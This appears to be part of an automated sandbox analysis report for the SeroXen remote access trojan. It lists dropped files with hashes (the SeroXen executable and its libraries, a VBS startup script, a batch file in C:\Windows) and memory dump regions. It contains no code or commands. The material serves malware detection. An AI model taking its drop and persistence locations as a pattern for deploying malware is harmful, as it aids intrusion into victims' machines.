SHA5128119df718e37efed003fac05d48686d52aae132c324370142a2aca847af27c1455b63048199906bab5e0cbdd6ea15bbfd6f53a0cefeb786e0e557a54b9834c91
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Mono.Cecil.Pdb.dllFilesize
265KB
MD5c6c90c9a2a3b7735c78ab274e1be51ac
SHA1e4a5aa44b47e605167e80d5b49ebdf844ccb91d5
SHA25614f9512115c3f24ea4433cc74b2ed4ad68122cfc38633f8ba83306d4c5628c1b
SHA5128e2cba3c2b08dc7cc27e5788b59660d0e6f40ae123138107b269b6cc603d569aff0c4b369c28ff473adaa5715cc96d373e0917d1b291daef4cd5d136700fc926
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Mono.Cecil.Rocks.dllFilesize
100KB
MD5efc05992923eae4261142d6c6e0766ea
SHA1861dc1f1597330248586c75b3eaab0f36b2b3485
SHA2568f7d70e962f46af559614267c2153b4db6609a54f56f8388a0e16ba401970f52
SHA51270ba3cfc82884831c57626005fa30522711898f9a56bd8a3645c1eba7c8239be077cac5d011d6f7fae76439ae7e5c3f8864e592e5634964a4fe2a83196c0e84a
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Mono.Cecil.dllFilesize
1.8MB
MD5925879684b81b251f166e375dc722f27
SHA1eabfb765267902df4abe38c28ec894e3637332d3
SHA256867df4eae1113e63ad5d744477fb34954f339fca68c8b60cea1368e28503800e
SHA5126d2543ebdaea8ea3d9f2ee5b03f5de3142c8d3e08f36c4879aad76a6cb46da99cd8da869cf0262c4e677f81db1c8470feb7ea148ba67d21cd2d6b620da5ad02e
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\MonoMod.Backports.dllFilesize
413KB
MD57d4861a14f7d85efaae7df5121944e87
SHA1340cdd6e161176ea5d2a6a154cee032b992e11b8
SHA256880926c9af1f688d45062e54593a888578e81dc4620e2bef8bffe493c1e5bc9b
SHA512e3666f567ddaccc5a14158baaf121a3c760ab6fb2f2ab2035a5772c3c3bd58e0b07083944450206204d26fbbfe9d6fca3f7f1d8cc97369cbf55c74be0d8c3d89
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\MonoMod.ILHelpers.dllFilesize
15KB
MD51052681371e9dc33ba6e0b8afb384332
SHA103fb145610170064c2e70afde5fbbfa55b4d5c73
SHA25664c83b46cb099c02b4d860f58040bf0236326ec25b3217a4eff71e92a5ee37df
SHA512f7d7c27ac0e952dc35bad95ac4d6821614b804757c0326107522821ef9d9cdd9c0ef91bbe01d2c8304fce4bbc592aed513903dfa5b080ac75b9f6d0d10dcd77e
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\MonoMod.Utils.dllFilesize
886KB
MD5808f79ce91a5e67c9bdabef436abe714
SHA1a499ea1b2482b613825a980f2e851886ec661a1b
SHA25643f5d2893bd976ae0ce559c38d95eccb516325f9f654f8cebefb13554d36fd27
SHA51280f9ba3523afa57f15f6c600a92579ecdd0c65d6e7d0473ca35b1164efabf1b0d0414b41e713b08ad8e07e07cbfe16932c4d593cc4ce2ea453633f70ebc29f4c
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Newtonsoft.Json.dllFilesize
684KB
MD5c467814a1cf2cd5d297553f51aeb41db
SHA1d0d81e08833b59a51ec9df98b17b5d36e5b07bf5
SHA25625553ca736b5a1f10ab3f60a6f3594af79600d8ebb01875366f0e153d6c739ed
SHA51223709dc556fe1bdb2ce046da31fe6d5376456191aecb14cea0f7f7092ca08158ff45ac9e75805b9c0cb22cc35da7b7d7b8416d4fa96de4f7443956af10dad09b
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Open.Nat.dllFilesize
328KB
MD5de7413b148730d4b50baf70079ea3f77
SHA1f92dbc5d17c8bc92fd1f25e9e7e4b3b76120b9b7
SHA2569d8c06a65a9af7ddf36d67d9d7383b1808ae282b67fe412bf8b75adab4f8d020
SHA512c6b858190bf30438831ed7602581158f72f4b64b5b1fb07b85cde76c642a5f617d0106b37ab1ef79bf237713c41982563fb1be4402920d4532db7e5c1ce32304
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Quasar.Common.Tests.dllFilesize
11KB
MD5d83c314d13844ac6d938ec98ef5cc502
SHA111be0e01c20cbaa9dd71d5b73c13c64084441a8c
SHA256e7369839f74d8a3243108ff788eb6f916bda3ed8f123d6bdbdbf2f794f2c1af9
SHA51211a051b38dc9d3204f3688975e754a11c2f32008dc9cbfdb9664825eac4adea0f2b86f2823b99118e89089443408cc38575f02e35680001b26790b959a738f02
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Renci.SshNet.dllFilesize
3.7MB
MD538b483c1f86d2caf3bb0662dedef9516
SHA1147386f8d231fbaa50512fcbba6e9d12ebe92f3e
SHA256859e6c8f999af42e677a90f00482d33bc3a78884344f7fdff0e5b51f03ca3375
SHA5129c9ca5c3be7514bfdd5dce6258df71f7df8a1ac23f8a5e1ecc4d074301f6b9ed016e98e7280cb7e549f7808daacd5455aca894dbab8f2ac8aab72d5bee037bc8
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exeFilesize
378KB
MD5c14c7d9bdf750ed2922e93934281726f
SHA1ceed91150c87b5b836219e4ec94f13221a5e1f5c
SHA256624c25a5293b465fd3a37cc7be7405bd532311e28e96b84c0353cd6b9aa2179b
SHA5120934819074409b3ee995685d94bbcfd80a4e7c26e2bef0b4e81f3984d94cae61e8912f689fd3c6ebde17fd8df4f6e1cc79d8d99dfecde3b472a37b357da198d0
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\System.Management.Automation.dllFilesize
353KB
MD53f8ac0a7be2c53071bdc5da410815ee8
SHA1fd07dbe5dbaef1934dc96cd658fce699e8f4cd12
SHA25601ce775ddc060a4ce46100c2c4a109ed84827af8fa71745a49e34a1fbaa2858e
SHA512e922b29d6e65080d9c07988808bd35376c0393d5445be90724a74d2f676c2b6fc6ef602fe149372d40f01d7b21b05c6573050fb66d7e0fd28fd1c82f8493e029
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\System.ValueTuple.dllFilesize
62KB
MD5cc379594492af38d98913aea6fbc4408
SHA11eb806b5bedd1d79a2a304048b054605760e7a8b
SHA25691462515d169dd8aa19ec604e12c0b6c81d941c816869512680d027f9420d8da
SHA5128afa38da75bc4a3e094150f522ed7f88d7cfc6fe4a35516add16d2431794403908aa9bff886d34d6881ae70b83e2a26fb016ff4cbaee6bf9fb6fc33032180354
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\dnlib.dllFilesize
6.1MB
MD5d7b36d83104d9013f96abbee3107baca
SHA1456cf25a25f55a0f7a3edd89b2498c4311f5ba92
SHA2567b7291a45ae4e8f0b06d2ae26ad5cd7d8614189b101d3644aa36b5db2ff17a61
SHA5123a8fdcc6c3e84c5aeec6988388cf7b5f7419a55a9a293cfaf7da7cff536af6dd07596be3ea10648c620bcf568bb9f675fee5646dc7c3ea4252817e745c2f50b7
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\protobuf-net.dllFilesize
1.5MB
MD544ee2a9fe1c7040a897c305ea8b3595c
SHA17f126b3f279bc09ce139e0a7c59b3ca2bbc373e6
SHA25644f9a8d84dd2a8d8271af62bcd4c330d4cfa741f9461dd612573c4f4bb410598
SHA512a3bde2c4786213e4ec7d6d5140309ef8c2d7297b4690b4d535cc537156e7af5a4b08e6a477cefa89ee20ba0de7c5439938c09a90baca4d5147aad785343dae8f
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\settings.xmlFilesize
688B
MD55769c0618b9fe4873c9256b5cbbf2b95
SHA1e123705e308feb804baf0f23949f966e78162dd5
SHA256a5828dc580978f8e1f37459d33e8158416b6c8a0c2881e9eabced034ecfbd15c
SHA51215f80ce7cb33125c856dd7b6ed032dedc0ea30c40eb72d44e0c4f7cecefe33e54449c51f70efe88154dc35f52bdaa78b6fa6079cc55425aefcd7088d3f25acae
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tnneyrqv.tnu.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.vbsFilesize
124B
MD5a0822380401028afa7f1003de4dc96af
SHA12ca868dfe8a2ebff45e25a9e55319b7358826b61
SHA256ed4256f0b5b7f6a5dc4dfc26b98980cf95dbc8c8c45c72e1d7a9aa82a885d6eb
SHA5122ab21139283d6508f68abb3543a15dced41bb4bd2cbb2f640ac63bdfe7112613ece544c9ef26a27db2cc9da3db3aba036c243e4840b5dc72aabc4279d229a10c
-
C:\Windows\Uni.batFilesize
586KB
MD53a43120a8dd1e42ff894670710bd8bc4
SHA1dbb9244231da204517f5d7a0e5ca713b64a3c175
SHA256b3db27588a80527cb09b85476ed59ce698dc9a4b6b03246160de944ecc5ca79d
SHA51215931135fd1fec93a3d77e0f28a19ca0780e7de34ab6a4f8174999cf534b4f810ace2bba0db3f2d0d0007199771b16d0c2bc3cdee48ef00a19be4705d3c26026
-
\??\pipe\crashpad_4008_UCWYGPXWIWPBMWPVMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/908-627-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/960-595-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1088-626-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1112-608-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1132-605-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1140-544-0x0000025F6E3F0000-0x0000025F6E466000-memory.dmpFilesize
472KB
-
memory/1140-545-0x0000025F6DF60000-0x0000025F6DF68000-memory.dmpFilesize
32KB
-
memory/1140-546-0x0000025F6E370000-0x0000025F6E3E0000-memory.dmpFilesize
448KB
-
memory/1140-543-0x0000025F6DF80000-0x0000025F6DFC4000-memory.dmpFilesize
272KB
-
memory/1324-588-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1344-589-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1564-591-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1572-590-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1676-629-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1704-610-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1732-606-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1772-587-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1880-628-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1888-634-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1984-679-0x000001B5C7B80000-0x000001B5C7BBC000-memory.dmpFilesize
240KB
-
memory/1984-678-0x000001B5C7B20000-0x000001B5C7B32000-memory.dmpFilesize
72KB
-
memory/1984-623-0x000001B5C7340000-0x000001B5C739E000-memory.dmpFilesize
376KB
-
memory/2064-612-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2124-607-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2148-593-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2264-635-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2496-611-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2504-609-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2740-594-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2852-637-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2860-624-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2880-621-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3292-592-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3456-636-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3524-575-0x0000000008F10000-0x0000000008F3A000-memory.dmpFilesize
168KB
-
memory/3524-577-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3656-625-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3924-596-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/4124-503-0x000001D8E8780000-0x000001D8E87D8000-memory.dmpFilesize
352KB
-
memory/4124-504-0x000001D8EA400000-0x000001D8EA43C000-memory.dmpFilesize
240KB
-
memory/4124-506-0x000001D8EAD90000-0x000001D8EADCE000-memory.dmpFilesize
248KB
-
memory/4136-622-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/5272-684-0x0000016126060000-0x00000161260C4000-memory.dmpFilesize
400KB
-
memory/5272-686-0x0000016140B20000-0x0000016140EE2000-memory.dmpFilesize
3.8MB
-
memory/5348-507-0x00000260C6E90000-0x00000260C6EB2000-memory.dmpFilesize
136KB
-
memory/5840-486-0x0000000000620000-0x000000000070E000-memory.dmpFilesize
952KB